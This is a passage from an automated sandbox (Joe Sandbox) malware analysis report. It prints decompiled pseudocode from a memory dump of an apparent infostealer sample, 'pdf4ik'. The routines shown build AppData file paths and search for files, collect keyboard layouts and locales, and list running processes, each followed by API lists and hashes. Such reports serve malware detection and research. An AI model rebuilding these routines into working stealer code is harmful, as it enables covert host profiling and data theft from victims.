							E29DADF3B();
							_t396 = _t396 + 4;
						}
						_v4240 = _t289;
						_v4236 = _t289;
						_v4232 = _t289;
						_t350 =  *_t383;
						_v4240 = _t350;
						_v4236 =  *((intOrPtr*)(_t383 + 4));
						_v4232 =  *((intOrPtr*)(_t383 + 8));
						 *_t383 = _t289;
						 *((intOrPtr*)(_t383 + 4)) = _t289;
						 *((intOrPtr*)(_t383 + 8)) = _t289;
					}
					_v8 = 1;
					_t368 = _v4040;
					if(_t368 == _t289) {
						L41:
						_t233 = _v4236;
						_t369 = _v4240;
						_v4224 = _t233;
						_t384 = _t369;
						if(_t369 == _t233) {
							L65:
							if(_t369 == _t289) {
								L72:
								_v4240 = _t289;
								_v4236 = _t289;
								_v4232 = _t289;
								if(_v4172 >= 0x10) {
									_push(_v4192);
									_t233 = E29DADF3B();
								}
								 *[fs:0x0] = _v16;
								_pop(_t370);
								_pop(_t385);
								_pop(_t290);
								return E29DADF46(_t233, _t290, _v24 ^ _t388, _t350, _t370, _t385);
							}
							_t386 = _t233;
							if(_t369 == _t233) {
								L71:
								_push(_t369);
								_t233 = E29DADF3B();
								_t396 = _t396 + 4;
								goto L72;
							} else {
								goto L67;
							}
							do {
								L67:
								if( *((intOrPtr*)(_t369 + 0x14)) >= 8) {
									_t350 =  *_t369;
									_push( *_t369);
									E29DADF3B();
									_t396 = _t396 + 4;
								}
								 *((intOrPtr*)(_t369 + 0x14)) = 7;
								 *((intOrPtr*)(_t369 + 0x10)) = _t289;
								 *_t369 = 0;
								_t369 = _t369 + 0x1c;
							} while (_t369 != _t386);
							_t369 = _v4240;
							goto L71;
						} else {
							goto L42;
						}
						do {
							L42:
							_v4052 = 0;
							_v4032 = 7;
							_v4036 = _t289;
							E29D97940( &_v4052, _t384, _t289);
							_v8 = 9;
							_t241 = E29DA48F0( &_v4052,  &_v4220, _t350);
							_v8 = 0xa;
							_t321 =  *0x29dd7ffc; // 0x15a40d8
							_t243 = E29D95460( &_v4164,  &_v4192, _t321);
							_v8 = 0xb;
							_t373 = E29D89980(_t241, _t243,  &_v4080);
							_v8 = 0xc;
							_t247 = E29DA48F0( &_v4052,  &_v4108,  &_v4080);
							_v8 = 0xd;
							_t248 =  *0x29dd7d2c; // 0x15a2f38
							_t249 = E29D89930(_t248,  &_v4136, _t247);
							_t396 = _t396 + 0x14;
							_v8 = 0xe;
							if( *((intOrPtr*)(_t373 + 0x14)) >= 0x10) {
								_t373 =  *_t373;
							}
							if( *((intOrPtr*)(_t249 + 0x14)) >= 0x10) {
								_t249 =  *_t249;
							}
							_t325 =  *((intOrPtr*)(_v4244 + 0x20));
							if(_t325 != 0) {
								__eflags =  *_t325 - 2;
								if( *_t325 == 2) {
									 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t325 + 4)), _t373, _t249, 0, 2);
									_t350 = 0x10;
								} else {
									 *0x29dd8814 = 0x80000;
								}
							} else {
								 *0x29dd8814 = 0x10000;
							}
							if(_v4116 >= _t350) {
								_push(_v4136);
								E29DADF3B();
								_t396 = _t396 + 4;
								_t350 = 0x10;
							}
							_v4116 = 0xf;
							_v4120 = 0;
							_v4136 = 0;
							if(_v4088 >= _t350) {
								_push(_v4108);
								E29DADF3B();
								_t396 = _t396 + 4;
								_t350 = 0x10;
							}
							_v4088 = 0xf;
							_v4092 = 0;
							_v4108 = 0;
							if(_v4060 >= _t350) {
								_push(_v4080);
								E29DADF3B();
								_t396 = _t396 + 4;
								_t350 = 0x10;
							}
							_v4060 = 0xf;
							_v4064 = 0;
							_v4080 = 0;
							if(_v4144 >= _t350) {
								_push(_v4164);
								E29DADF3B();
								_t396 = _t396 + 4;
								_t350 = 0x10;
							}
							_v4144 = 0xf;
							_v4148 = 0;
							_v4164 = 0;
							if(_v4200 >= _t350) {
								_push(_v4220);
								E29DADF3B();
								_t396 = _t396 + 4;
							}
							_v8 = 1;
							if(_v4032 >= 8) {
								_push(_v4052);
								E29DADF3B();
								_t396 = _t396 + 4;
							}
							_t384 = _t384 + 0x1c;
							_t289 = 0;
						} while (_t384 != _v4224);
						_t233 = _v4236;
						_t369 = _v4240;
						goto L65;
					} else {
						_t387 = _v4036;
						if(_t368 == _t387) {
							L40:
							_push(_t368);
							E29DADF3B();
							_t396 = _t396 + 4;
							goto L41;
						}
						do {
							if( *((intOrPtr*)(_t368 + 0x14)) >= 8) {
								_push( *_t368);
								E29DADF3B();
								_t396 = _t396 + 4;
							}
							_t350 = 0;
							 *((intOrPtr*)(_t368 + 0x14)) = 7;
							 *((intOrPtr*)(_t368 + 0x10)) = _t289;
							 *_t368 = 0;
							_t368 = _t368 + 0x1c;
						} while (_t368 != _t387);
						_t368 = _v4040;
						goto L40;
					}
				} else {
					goto L5;
				}
				do {
					L5:
					_v4052 = 0;
					_v4032 = 7;
					_v4036 = _t289;
					E29D97940( &_v4052, _t382, _t289);
					_v8 = 2;
					_t270 = E29DA48F0( &_v4052,  &_v4220, _t348);
					_v8 = 3;
					_t331 =  *0x29dd7e68; // 0x1597268
					_t272 = E29D95460( &_v4136,  &_v4192, _t331);
					_v8 = 4;
					_t378 = E29D89980(_t270, _t272,  &_v4108);
					_v8 = 5;
					_t276 = E29DA48F0( &_v4052,  &_v4080,  &_v4108);
					_v8 = 6;
					_t277 =  *0x29dd7cb8; // 0x1597088
					_t278 = E29D89930(_t277,  &_v4164, _t276);
					_t395 = _t395 + 0x14;
					_v8 = 7;
					if( *((intOrPtr*)(_t378 + 0x14)) >= 0x10) {
						_t378 =  *_t378;
					}
					if( *((intOrPtr*)(_t278 + 0x14)) >= 0x10) {
						_t278 =  *_t278;
					}
					_t335 =  *((intOrPtr*)(_v4244 + 0x20));
					if(_t335 != 0) {
						__eflags =  *_t335 - 2;
						if( *_t335 == 2) {
							 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t335 + 4)), _t378, _t278, 0, 2);
							_t348 = 0x10;
						} else {
							 *0x29dd8814 = 0x80000;
						}
					} else {
						 *0x29dd8814 = 0x10000;
					}
					if(_v4144 >= _t348) {
						_push(_v4164);
						E29DADF3B();
						_t395 = _t395 + 4;
						_t348 = 0x10;
					}
					_v4144 = 0xf;
					_v4148 = 0;
					_v4164 = 0;
					if(_v4060 >= _t348) {
						_push(_v4080);
						E29DADF3B();
						_t395 = _t395 + 4;
						_t348 = 0x10;
					}
					_v4060 = 0xf;
					_v4064 = 0;
					_v4080 = 0;
					if(_v4088 >= _t348) {
						_push(_v4108);
						E29DADF3B();
						_t395 = _t395 + 4;
						_t348 = 0x10;
					}
					_v4088 = 0xf;
					_v4092 = 0;
					_v4108 = 0;
					if(_v4116 >= _t348) {
						_push(_v4136);
						E29DADF3B();
						_t395 = _t395 + 4;
						_t348 = 0x10;
					}
					_v4116 = 0xf;
					_v4120 = 0;
					_v4136 = 0;
					if(_v4200 >= _t348) {
						_push(_v4220);
						E29DADF3B();
						_t395 = _t395 + 4;
					}
					_v8 = 1;
					if(_v4032 >= 8) {
						_push(_v4052);
						E29DADF3B();
						_t395 = _t395 + 4;
					}
					_t382 = _t382 + 0x1c;
					_t289 = 0;
				} while (_t382 != _v4224);
				goto L27;
				L1:
				_t300 =  *_t197;
				_t197 = _t197 + 1;
				if(_t300 != 0) {
					goto L1;
				} else {
					E29D892C0( &_v4192, _t365, _t197 - _t381);
					_v8 = 0;
					E29DB5640( &_v1024, 0, 0x3e8);
					E29DB5640( &_v3024, 0, 0x3e8);
					E29DB5640( &_v2024, 0, 0x3e8);
					_t24 = (0 |  *0x29dd8500(0, 0x1a, 0, 0,  &_v2024) < 0x00000000) - 1; // -1
					lstrcatA( &_v1024, _t24 &  &_v2024);
					_t305 =  *0x29dd7e68; // 0x1597268
					lstrcatA( &_v1024, _t305);
					_t211 =  *0x29dd7b2c; // 0x15a4b80
					lstrcatA( &_v1024, _t211);
					E29DB5640( &_v2024, 0, 0x3e8);
					_t33 = (0 |  *0x29dd8500(0, 0x1a, 0, 0,  &_v2024) < 0x00000000) - 1; // -1
					lstrcatA( &_v3024, _t33 &  &_v2024);
					_t309 =  *0x29dd7ffc; // 0x15a40d8
					lstrcatA( &_v3024, _t309);
					lstrcatA( &_v3024, "*");
					_t395 = _t390 + 0x30 - 0x1c;
					_t310 = _t395;
					_t223 =  &_v1024;
					 *((intOrPtr*)(_t310 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t310 + 0x10)) = 0;
					_v4224 = _t395;
					 *_t310 = 0;
					_t366 = _t223 + 1;
					goto L3;
				}
			}































































































                                        0x29d9c6d6
                                        0x29d9c6db
                                        0x29d9c6e0
                                        0x29d9c6e2
                                        0x29d9c6ec
                                        0x29d9c6fa
                                        0x29d9c704
                                        0x29d9c70a
                                        0x29d9c70f
                                        0x29d9c728
                                        0x29d9c731
                                        0x29d9c73b
                                        0x29d9c741
                                        0x29d9c747
                                        0x29d9c74a
                                        0x29d9c74c
                                        0x29d9c74e
                                        0x29d9c74e
                                        0x29d9c74e
                                        0x29d9c890
                                        0x29d9c890
                                        0x29d9c890
                                        0x29d9c892
                                        0x29d9c893
                                        0x29d9c893
                                        0x29d9c89a
                                        0x29d9c8a1
                                        0x29d9c8ac
                                        0x29d9c8b1
                                        0x29d9c8b5
                                        0x29d9c8bb
                                        0x29d9c8c1
                                        0x29d9c8c7
                                        0x29d9c8cb
                                        0x29d9cad0
                                        0x29d9cad0
                                        0x29d9cad3
                                        0x29d9cad5
                                        0x29d9cadb
                                        0x29d9cae2
                                        0x29d9cae5
                                        0x29d9caeb
                                        0x29d9caed
                                        0x29d9caf0
                                        0x29d9caf0
                                        0x29d9caf2
                                        0x29d9caf3
                                        0x29d9caf3
                                        0x29d9cafa
                                        0x29d9cb03
                                        0x29d9cb13
                                        0x29d9cb1d
                                        0x29d9cb1f
                                        0x29d9cb27
                                        0x29d9cb2f
                                        0x29d9cb3a
                                        0x29d9cb3b
                                        0x29d9cb40
                                        0x29d9cb40
                                        0x29d9cb43
                                        0x29d9cb49
                                        0x29d9cb4f
                                        0x29d9cb55
                                        0x29d9cb57
                                        0x29d9cb60
                                        0x29d9cb69
                                        0x29d9cb6f
                                        0x29d9cb71
                                        0x29d9cb74
                                        0x29d9cb74
                                        0x29d9cb77
                                        0x29d9cb7b
                                        0x29d9cb83
                                        0x29d9cbc6
                                        0x29d9cbc6
                                        0x29d9cbcc
                                        0x29d9cbd2
                                        0x29d9cbd8
                                        0x29d9cbdc
                                        0x29d9cded
                                        0x29d9cdef
                                        0x29d9ce2d
                                        0x29d9ce34
                                        0x29d9ce3a
                                        0x29d9ce40
                                        0x29d9ce46
                                        0x29d9ce4e
                                        0x29d9ce4f
                                        0x29d9ce54
                                        0x29d9ce5a
                                        0x29d9ce62
                                        0x29d9ce63
                                        0x29d9ce64
                                        0x29d9ce72
                                        0x29d9ce72
                                        0x29d9cdf1
                                        0x29d9cdf5
                                        0x29d9ce24
                                        0x29d9ce24
                                        0x29d9ce25
                                        0x29d9ce2a
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d9cdf7
                                        0x29d9cdf7
                                        0x29d9cdfb
                                        0x29d9cdfd
                                        0x29d9cdff
                                        0x29d9ce00
                                        0x29d9ce05
                                        0x29d9ce05
                                        0x29d9ce0a
                                        0x29d9ce11
                                        0x29d9ce14
                                        0x29d9ce17
                                        0x29d9ce1a
                                        0x29d9ce1e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d9cbe2
                                        0x29d9cbe2
                                        0x29d9cbe5
                                        0x29d9cbf6
                                        0x29d9cc00
                                        0x29d9cc06
                                        0x29d9cc13
                                        0x29d9cc17
                                        0x29d9cc1e
                                        0x29d9cc22
                                        0x29d9cc37
                                        0x29d9cc4a
                                        0x29d9cc56
                                        0x29d9cc64
                                        0x29d9cc68
                                        0x29d9cc6d
                                        0x29d9cc72
                                        0x29d9cc7d
                                        0x29d9cc82
                                        0x29d9cc8a
                                        0x29d9cc91
                                        0x29d9cc93
                                        0x29d9cc93
                                        0x29d9cc98
                                        0x29d9cc9a
                                        0x29d9cc9a
                                        0x29d9cca2
                                        0x29d9cca9
                                        0x29d9ccb7
                                        0x29d9ccba
                                        0x29d9ccd6
                                        0x29d9ccdb
                                        0x29d9ccbc
                                        0x29d9ccbc
                                        0x29d9ccbc
                                        0x29d9ccab
                                        0x29d9ccab
                                        0x29d9ccab
                                        0x29d9cce6
                                        0x29d9ccee
                                        0x29d9ccef
                                        0x29d9ccf4
                                        0x29d9ccf7
                                        0x29d9ccf7
                                        0x29d9cd01
                                        0x29d9cd07
                                        0x29d9cd0d
                                        0x29d9cd19
                                        0x29d9cd21
                                        0x29d9cd22
                                        0x29d9cd27
                                        0x29d9cd2a
                                        0x29d9cd2a
                                        0x29d9cd2f
                                        0x29d9cd35
                                        0x29d9cd3b
                                        0x29d9cd47
                                        0x29d9cd4f
                                        0x29d9cd50
                                        0x29d9cd55
                                        0x29d9cd58
                                        0x29d9cd58
                                        0x29d9cd5d
                                        0x29d9cd63
                                        0x29d9cd69
                                        0x29d9cd75
                                        0x29d9cd7d
                                        0x29d9cd7e
                                        0x29d9cd83
                                        0x29d9cd86
                                        0x29d9cd86
                                        0x29d9cd8b
                                        0x29d9cd91
                                        0x29d9cd97
                                        0x29d9cda3
                                        0x29d9cdab
                                        0x29d9cdac
                                        0x29d9cdb1
                                        0x29d9cdb1
                                        0x29d9cdb4
                                        0x29d9cdbf
                                        0x29d9cdc7
                                        0x29d9cdc8
                                        0x29d9cdcd
                                        0x29d9cdcd
                                        0x29d9cdd0
                                        0x29d9cdd3
                                        0x29d9cdd5
                                        0x29d9cde1
                                        0x29d9cde7
                                        0x00000000
                                        0x29d9cb85
                                        0x29d9cb85
                                        0x29d9cb8d
                                        0x29d9cbbd
                                        0x29d9cbbd
                                        0x29d9cbbe
                                        0x29d9cbc3
                                        0x00000000
                                        0x29d9cbc3
                                        0x29d9cb90
                                        0x29d9cb94
                                        0x29d9cb98
                                        0x29d9cb99
                                        0x29d9cb9e
                                        0x29d9cb9e
                                        0x29d9cba1
                                        0x29d9cba3
                                        0x29d9cbaa
                                        0x29d9cbad
                                        0x29d9cbb0
                                        0x29d9cbb3
                                        0x29d9cbb7
                                        0x00000000
                                        0x29d9cbb7
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d9c8d1
                                        0x29d9c8d1
                                        0x29d9c8d4
                                        0x29d9c8e5
                                        0x29d9c8ef
                                        0x29d9c8f5
                                        0x29d9c902
                                        0x29d9c906
                                        0x29d9c90d
                                        0x29d9c911
                                        0x29d9c926
                                        0x29d9c939
                                        0x29d9c945
                                        0x29d9c953
                                        0x29d9c957
                                        0x29d9c95c
                                        0x29d9c961
                                        0x29d9c96c
                                        0x29d9c971
                                        0x29d9c979
                                        0x29d9c980
                                        0x29d9c982
                                        0x29d9c982
                                        0x29d9c987
                                        0x29d9c989
                                        0x29d9c989
                                        0x29d9c991
                                        0x29d9c998
                                        0x29d9c9a6
                                        0x29d9c9a9
                                        0x29d9c9c5
                                        0x29d9c9ca
                                        0x29d9c9ab
                                        0x29d9c9ab
                                        0x29d9c9ab
                                        0x29d9c99a
                                        0x29d9c99a
                                        0x29d9c99a
                                        0x29d9c9d5
                                        0x29d9c9dd
                                        0x29d9c9de
                                        0x29d9c9e3
                                        0x29d9c9e6
                                        0x29d9c9e6
                                        0x29d9c9f0
                                        0x29d9c9f6
                                        0x29d9c9fc
                                        0x29d9ca08
                                        0x29d9ca10
                                        0x29d9ca11
                                        0x29d9ca16
                                        0x29d9ca19
                                        0x29d9ca19
                                        0x29d9ca1e
                                        0x29d9ca24
                                        0x29d9ca2a
                                        0x29d9ca36
                                        0x29d9ca3e
                                        0x29d9ca3f
                                        0x29d9ca44
                                        0x29d9ca47
                                        0x29d9ca47
                                        0x29d9ca4c
                                        0x29d9ca52
                                        0x29d9ca58
                                        0x29d9ca64
                                        0x29d9ca6c
                                        0x29d9ca6d
                                        0x29d9ca72
                                        0x29d9ca75
                                        0x29d9ca75
                                        0x29d9ca7a
                                        0x29d9ca80
                                        0x29d9ca86
                                        0x29d9ca92
                                        0x29d9ca9a
                                        0x29d9ca9b
                                        0x29d9caa0
                                        0x29d9caa0
                                        0x29d9caa3
                                        0x29d9caae
                                        0x29d9cab6
                                        0x29d9cab7
                                        0x29d9cabc
                                        0x29d9cabc
                                        0x29d9cabf
                                        0x29d9cac2
                                        0x29d9cac4
                                        0x00000000
                                        0x29d9c751
                                        0x29d9c751
                                        0x29d9c753
                                        0x29d9c756
                                        0x00000000
                                        0x29d9c758
                                        0x29d9c762
                                        0x29d9c774
                                        0x29d9c777
                                        0x29d9c78c
                                        0x29d9c7a1
                                        0x29d9c7c8
                                        0x29d9c7d5
                                        0x29d9c7db
                                        0x29d9c7e9
                                        0x29d9c7ef
                                        0x29d9c7fc
                                        0x29d9c80f
                                        0x29d9c836
                                        0x29d9c843
                                        0x29d9c849
                                        0x29d9c857
                                        0x29d9c869
                                        0x29d9c86f
                                        0x29d9c872
                                        0x29d9c874
                                        0x29d9c87a
                                        0x29d9c881
                                        0x29d9c884
                                        0x29d9c88a
                                        0x29d9c88c
                                        0x00000000
                                        0x29d9c88c

                                        APIs
                                        • _memset.LIBCMT ref: 29D9C70A
                                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,00000000,?,?,?,?,29D94906,00000000), ref: 29D9C71E
                                        • _memset.LIBCMT ref: 29D9C777
                                        • _memset.LIBCMT ref: 29D9C78C
                                        • _memset.LIBCMT ref: 29D9C7A1
                                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 29D9C7B5
                                        • lstrcatA.KERNEL32(?,-00000001), ref: 29D9C7D5
                                        • lstrcatA.KERNEL32(?,01597268), ref: 29D9C7E9
                                        • lstrcatA.KERNEL32(?,015A4B80), ref: 29D9C7FC
                                        • _memset.LIBCMT ref: 29D9C80F
                                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 29D9C823
                                        • lstrcatA.KERNEL32(?,-00000001), ref: 29D9C843
                                        • lstrcatA.KERNEL32(?,015A40D8), ref: 29D9C857
                                        • lstrcatA.KERNEL32(?,29DCFE74), ref: 29D9C869
                                          • Part of subcall function 29DA4C40: FindFirstFileW.KERNEL32(00000000,?,?,D9555F04,?,00000000,00000000), ref: 29DA4CA2
                                          • Part of subcall function 29DA4C40: FindNextFileW.KERNEL32(?,?,?), ref: 29DA4D46
                                          • Part of subcall function 29D97940: std::_Xinvalid_argument.LIBCPMT ref: 29D97957
                                          • Part of subcall function 29DA48F0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000010,?), ref: 29DA491E
                                          • Part of subcall function 29DA48F0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,29DA410F,00000000,00000000), ref: 29DA494C
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$_memset$FolderPath$ByteCharFileFindMultiWide$FirstNextXinvalid_argumentstd::_
                                        • String ID:
                                        • API String ID: 1016014242-0
                                        • Opcode ID: b37239cb3c6c60d05654fd0f3cd15fc6ad13cbd7bbe0bce87c3c5184f3c06524
                                        • Instruction ID: f3158ffa012471874f5bf69eefdf06bda4b0339c6c42cc86211293720c954c12
                                        • Opcode Fuzzy Hash: b37239cb3c6c60d05654fd0f3cd15fc6ad13cbd7bbe0bce87c3c5184f3c06524
                                        • Instruction Fuzzy Hash: 1D22B0B1D10299DBDB20DF24D884ADEB7B5AF58300F0085EDD14DA7640DB74AA85EFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA3A00 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 82memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 95%
                                        			E29DA3A00() {
				signed int _v8;
				char _v520;
				CHAR* _v524;
				int _v528;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				void* _t19;
				int _t23;
				void* _t34;
				int _t40;
				int _t41;
				signed int _t42;
				signed int _t43;
				void* _t44;
				void* _t45;

				_t16 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t16 ^ _t43;
				_t19 = HeapAlloc(GetProcessHeap(), 0, 0x1f4);
				_t40 = 0;
				_v524 = _t19;
				_t41 = GetKeyboardLayoutList(0, 0);
				_t34 = LocalAlloc(0x40, _t41 * 4);
				_t23 = GetKeyboardLayoutList(_t41, _t34);
				_t42 = 0;
				_v528 = _t23;
				if(_t23 != 0) {
					do {
						_t39 =  *(_t34 + _t42 * 4) & 0x0000ffff;
						GetLocaleInfoA( *(_t34 + _t42 * 4) & 0x0000ffff, 2,  &_v520, 0x200);
						if(_t40 == 0) {
							_t39 = _v524;
							wsprintfA(_v524, "%s",  &_v520);
							_t45 = _t44 + 0xc;
						} else {
							wsprintfA(_v524, "%s / %s", _v524,  &_v520);
							_t45 = _t44 + 0x10;
						}
						_t40 = _t40 + 1;
						E29DB5640( &_v520, 0, 0x200);
						_t42 = _t42 + 1;
						_t44 = _t45 + 0xc;
					} while (_t42 < _v528);
				}
				if(_t34 != 0) {
					LocalFree(_t34);
				}
				return E29DADF46(_v524, _t34, _v8 ^ _t43, _t39, _t40, _t42);
			}




















                                        0x29da3a09
                                        0x29da3a10
                                        0x29da3a24
                                        0x29da3a2a
                                        0x29da3a2e
                                        0x29da3a3a
                                        0x29da3a4c
                                        0x29da3a50
                                        0x29da3a56
                                        0x29da3a58
                                        0x29da3a60
                                        0x29da3a70
                                        0x29da3a70
                                        0x29da3a83
                                        0x29da3a8b
                                        0x29da3aac
                                        0x29da3abf
                                        0x29da3ac5
                                        0x29da3a8d
                                        0x29da3aa1
                                        0x29da3aa7
                                        0x29da3aa7
                                        0x29da3ad6
                                        0x29da3ad7
                                        0x29da3adc
                                        0x29da3add
                                        0x29da3ae0
                                        0x29da3a70
                                        0x29da3aea
                                        0x29da3aed
                                        0x29da3aed
                                        0x29da3b09

                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,000001F4,00000010,0000000F,00000000), ref: 29DA3A1D
                                        • HeapAlloc.KERNEL32(00000000), ref: 29DA3A24
                                        • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 29DA3A34
                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 29DA3A46
                                        • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 29DA3A50
                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 29DA3A83
                                        • wsprintfA.USER32 ref: 29DA3AA1
                                        • wsprintfA.USER32 ref: 29DA3ABF
                                        • _memset.LIBCMT ref: 29DA3AD7
                                        • LocalFree.KERNEL32(00000000), ref: 29DA3AED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocHeapKeyboardLayoutListLocalwsprintf$FreeInfoLocaleProcess_memset
                                        • String ID: %s / %s
                                        • API String ID: 2849719339-2910687431
                                        • Opcode ID: 99e01a46642ce04d1a77f80452a2568c63e12a2355d58eec6cb6335bc4583195
                                        • Instruction ID: cd934978f8e5cf35a63ad799d497cd4b5990f376437b7ccbfc021f0b5ae124b6
                                        • Opcode Fuzzy Hash: 99e01a46642ce04d1a77f80452a2568c63e12a2355d58eec6cb6335bc4583195
                                        • Instruction Fuzzy Hash: 1521D6B2940368ABD710ABA4DC8DFABB77CEF44B05F008199F619E7141DA349D459FB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA3B10 Relevance: 15.1, APIs: 10, Instructions: 87stringprocessCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 69%
                                        			E29DA3B10(CHAR* __esi) {
				char _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v28;
				char _v32;
				char _v48;
				char _v312;
				intOrPtr _v340;
				void* _v348;
				void* __ebx;
				void* __edi;
				signed int _t21;
				signed int _t22;
				int _t27;
				int _t29;
				CHAR* _t34;
				void* _t40;
				void* _t52;
				void* _t53;
				CHAR* _t54;
				signed int _t55;
				void* _t56;
				void* _t57;

				_t54 = __esi;
				_push(0xffffffff);
				_push(E29DC2E78);
				_push( *[fs:0x0]);
				_t57 = _t56 - 0x150;
				_t21 =  *0x29dd5664; // 0xd9555f04
				_t22 = _t21 ^ _t55;
				_v20 = _t22;
				_push(_t22);
				 *[fs:0x0] =  &_v16;
				_v348 = 0x128;
				_t52 = CreateToolhelp32Snapshot(2, 0);
				if(Process32First(_t52,  &_v348) != 0) {
					_t29 = Process32Next(_t52,  &_v348);
					_t59 = _t29;
					if(_t29 != 0) {
						do {
							lstrcatA(_t54, "- ");
							lstrcatA(_t54,  &_v312);
							lstrcatA(_t54, " [");
							_t34 = E29DA4720( &_v48, _t59, _v340);
							_v8 = 0;
							if(_t34[0x14] >= 0x10) {
								_t34 =  *_t34;
							}
							lstrcatA(_t54, _t34);
							_v8 = 0xffffffff;
							if(_v28 >= 0x10) {
								_push(_v48);
								E29DADF3B();
								_t57 = _t57 + 4;
							}
							_v28 = 0xf;
							_v32 = 0;
							_v48 = 0;
							lstrcatA(_t54, "]\n");
							_t49 =  &_v348;
						} while (Process32Next(_t52,  &_v348) != 0);
					}
				}
				_t27 = CloseHandle(_t52);
				 *[fs:0x0] = _v16;
				_pop(_t53);
				_pop(_t40);
				return E29DADF46(_t27, _t40, _v20 ^ _t55, _t49, _t53, _t54);
			}


























                                        0x29da3b10
                                        0x29da3b13
                                        0x29da3b15
                                        0x29da3b20
                                        0x29da3b21
                                        0x29da3b27
                                        0x29da3b2c
                                        0x29da3b2e
                                        0x29da3b33
                                        0x29da3b37
                                        0x29da3b41
                                        0x29da3b51
                                        0x29da3b63
                                        0x29da3b71
                                        0x29da3b77
                                        0x29da3b79
                                        0x29da3b80
                                        0x29da3b86
                                        0x29da3b94
                                        0x29da3ba0
                                        0x29da3bb0
                                        0x29da3bb7
                                        0x29da3bbe
                                        0x29da3bc0
                                        0x29da3bc0
                                        0x29da3bc4
                                        0x29da3bca
                                        0x29da3bd5
                                        0x29da3bda
                                        0x29da3bdb
                                        0x29da3be0
                                        0x29da3be0
                                        0x29da3be9
                                        0x29da3bf0
                                        0x29da3bf3
                                        0x29da3bf6
                                        0x29da3bfc
                                        0x29da3c0a
                                        0x29da3b80
                                        0x29da3b79
                                        0x29da3c13
                                        0x29da3c1c
                                        0x29da3c24
                                        0x29da3c25
                                        0x29da3c33

                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 29DA3B4B
                                        • Process32First.KERNEL32(00000000,00000128), ref: 29DA3B5B
                                        • Process32Next.KERNEL32(00000000,00000128), ref: 29DA3B71
                                        • lstrcatA.KERNEL32(?,29DD0850), ref: 29DA3B86
                                        • lstrcatA.KERNEL32(?,?), ref: 29DA3B94
                                        • lstrcatA.KERNEL32(?,29DCFC3C), ref: 29DA3BA0
                                        • lstrcatA.KERNEL32(?,00000000,?), ref: 29DA3BC4
                                        • lstrcatA.KERNEL32(?,29DCFC40), ref: 29DA3BF6
                                        • Process32Next.KERNEL32(00000000,00000128), ref: 29DA3C04
                                        • CloseHandle.KERNEL32(00000000), ref: 29DA3C13
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 2202764116-0
                                        • Opcode ID: 5a7e46f11ed0c4bfb3c238f085adebaa780c16c4e50cd2d56da0295b915ee5dd
                                        • Instruction ID: caf5ce400d660707a64ec8ef273355a56c4114c4b5b0180df00c64aa3dfcec42
                                        • Opcode Fuzzy Hash: 5a7e46f11ed0c4bfb3c238f085adebaa780c16c4e50cd2d56da0295b915ee5dd
                                        • Instruction Fuzzy Hash: A531A172940248AFD7119FA4DC88FEEB779FF49B01F00816DF511A7680DB385605AF60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D8D7B0 Relevance: 14.5, APIs: 4, Strings: 4, Instructions: 508COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 86%
                                        			E29D8D7B0(intOrPtr* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v12;
				char _v280;
				char _v544;
				struct _SYSTEMTIME _v560;
				signed char _v561;
				signed char _v562;
				signed char _v563;
				signed char _v564;
				char _v566;
				char _v567;
				char _v568;
				char _v572;
				intOrPtr* _v576;
				void* _v580;
				struct _FILETIME _v588;
				struct _FILETIME _v596;
				struct _FILETIME _v604;
				unsigned int _v636;
				intOrPtr _v660;
				intOrPtr _v664;
				signed int _v672;
				unsigned int _v688;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t182;
				intOrPtr _t184;
				signed int _t191;
				void _t192;
				signed int _t193;
				void* _t194;
				signed int _t196;
				signed int _t197;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				unsigned int _t204;
				signed char _t206;
				signed int _t208;
				long _t216;
				signed int _t222;
				signed char _t223;
				signed int _t239;
